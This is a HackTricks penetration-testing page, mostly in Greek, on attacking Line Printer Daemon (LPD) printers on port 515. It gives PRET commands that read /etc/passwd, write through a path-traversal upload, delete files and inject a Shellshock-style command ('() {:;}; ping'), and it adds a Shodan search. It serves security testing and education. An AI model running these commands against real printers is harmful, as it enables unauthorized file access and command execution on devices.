hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

5.2 KiB
Raw Blame History

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Εισαγωγή στο Πρωτόκολλο LPD

Στη δεκαετία του 1980, το πρωτόκολλο Line Printer Daemon (LPD) αναπτύχθηκε στο Berkeley Unix, το οποίο αργότερα τυποποιήθηκε μέσω του RFC1179. Αυτό το πρωτόκολλο λειτουργεί μέσω της θύρας 515/tcp, επιτρέποντας αλληλεπιδράσεις μέσω της εντολής lpr. Η ουσία της εκτύπωσης μέσω LPD περιλαμβάνει την αποστολή ενός αρχείου ελέγχου (για να καθορίσει λεπτομέρειες εργασίας και χρήστη) μαζί με ένα αρχείο δεδομένων (το οποίο περιέχει τις πληροφορίες εκτύπωσης). Ενώ το αρχείο ελέγχου επιτρέπει την επιλογή διαφορετικών μορφών αρχείων για το αρχείο δεδομένων, η διαχείριση αυτών των αρχείων καθορίζεται από την συγκεκριμένη υλοποίηση LPD. Μια ευρέως αναγνωρισμένη υλοποίηση για συστήματα τύπου Unix είναι το LPRng. Σημαντικά, το πρωτόκολλο LPD μπορεί να εκμεταλλευτεί για την εκτέλεση κακόβουλου PostScript ή PJL print jobs.

Εργαλεία για Αλληλεπίδραση με Εκτυπωτές LPD

PRET εισάγει δύο βασικά εργαλεία, το lpdprint και το lpdtest, προσφέροντας μια απλή μέθοδο για αλληλεπίδραση με εκτυπωτές συμβατούς με LPD. Αυτά τα εργαλεία επιτρέπουν μια σειρά ενεργειών από την εκτύπωση δεδομένων μέχρι την επεξεργασία αρχείων στον εκτυπωτή, όπως η λήψη, η αποστολή ή η διαγραφή:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Για άτομα που ενδιαφέρονται να εξερευνήσουν περαιτέρω τον τομέα του printer hacking, μια ολοκληρωμένη πηγή μπορεί να βρεθεί εδώ: Hacking Printers.

Shodan

  • port 515

{% hint style="success" %} Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks
{% endhint %}